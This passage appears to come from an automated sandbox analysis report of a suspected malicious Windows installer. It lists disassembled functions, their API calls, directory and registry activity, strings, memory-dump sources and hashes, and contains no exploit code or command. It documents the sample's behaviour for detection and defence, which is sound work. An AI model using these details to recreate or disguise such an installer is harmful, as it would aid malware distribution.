                                                                      • Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 666 404ffa-40500f 667 405015-405026 666->667 668 4050c6-4050ca 666->668 669 405031-40503d lstrlenW 667->669 670 405028-40502c call 405d68 667->670 672 40505a-40505e 669->672 673 40503f-40504f lstrlenW 669->673 670->669 675 405060-405067 SetWindowTextW 672->675 676 40506d-405071 672->676 673->668 674 405051-405055 lstrcatW 673->674 674->672 675->676 677 405073-4050b5 SendMessageW * 3 676->677 678 4050b7-4050b9 676->678 677->678 678->668 679 4050bb-4050be 678->679 679->668
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                      • lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                      • lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
                                                                      • SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Frisurens
                                                                      • API String ID: 2531174081-3121014363
                                                                      • Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                      • Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
                                                                      • Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                      • Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 680 4015b9-4015cd call 402ad0 call 405859 685 401614-401617 680->685 686 4015cf-4015eb call 4057db CreateDirectoryW 680->686 687 401646-402195 call 401423 685->687 688 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 685->688 693 40160a-401612 686->693 694 4015ed-4015f8 GetLastError 686->694 702 402729-402730 687->702 703 40295d-40296c 687->703 688->703 704 40163e-401641 688->704 693->685 693->686 697 401607 694->697 698 4015fa-401605 GetFileAttributesW 694->698 697->693 698->693 698->697 702->703 704->703
                                                                      APIs
                                                                        • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,76233420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405867
                                                                        • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                                        • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,00000000,000000F0), ref: 00401630
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                      • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                                      • API String ID: 3751793516-2519038138
                                                                      • Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                                      • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                                      • Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                                      • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 707 405c13-405c45 RegOpenKeyExW 708 405c87-405c8a 707->708 709 405c47-405c66 RegQueryValueExW 707->709 710 405c74 709->710 711 405c68-405c6c 709->711 712 405c77-405c81 RegCloseKey 710->712 711->712 713 405c6e-405c72 711->713 712->708 713->710 713->712
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
                                                                      • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: : Completed
                                                                      • API String ID: 3677997916-2954849223
                                                                      • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                      • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                                      • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                      • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 714 4059fe-405a0a 715 405a0b-405a3f GetTickCount GetTempFileNameW 714->715 716 405a41-405a43 715->716 717 405a4e-405a50 715->717 716->715 718 405a45 716->718 719 405a48-405a4b 717->719 718->719
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405A1C
                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-1857211195
                                                                      • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                      • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                                      • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                      • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 720 401e51-401e62 call 402ad0 call 404ffa call 4054c8 726 401e67-401e6c 720->726 727 401e72-401e75 726->727 728 402729-402730 726->728 730 401ec6-401ecf CloseHandle 727->730 731 401e77-401e87 WaitForSingleObject 727->731 729 40295d-40296c 728->729 730->728 730->729 733 401e97-401e99 731->733 734 401e89-401e95 call 4060e9 WaitForSingleObject 733->734 735 401e9b-401eab GetExitCodeProcess 733->735 734->733 737 401eba-401ebd 735->737 738 401ead-401eb8 call 405c8d 735->738 737->730 742 401ebf 737->742 738->730 742->730
                                                                      APIs
                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                        • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                        • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 3585118688-0
                                                                      • Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                                      • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                                      • Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                                      • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 744 4054c8-4054f5 CreateProcessW 745 405503-405504 744->745 746 4054f7-405500 CloseHandle 744->746 746->745
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                      • CloseHandle.KERNEL32(?), ref: 004054FA
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004054DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                      • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                                      • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                      • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                                      APIs
                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 0040603D
                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406051
                                                                        • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406064
                                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 004031CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 4115351271-3512041753
                                                                      • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                      • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                                      • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                      • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                                      APIs
                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                                      • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                                      • Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
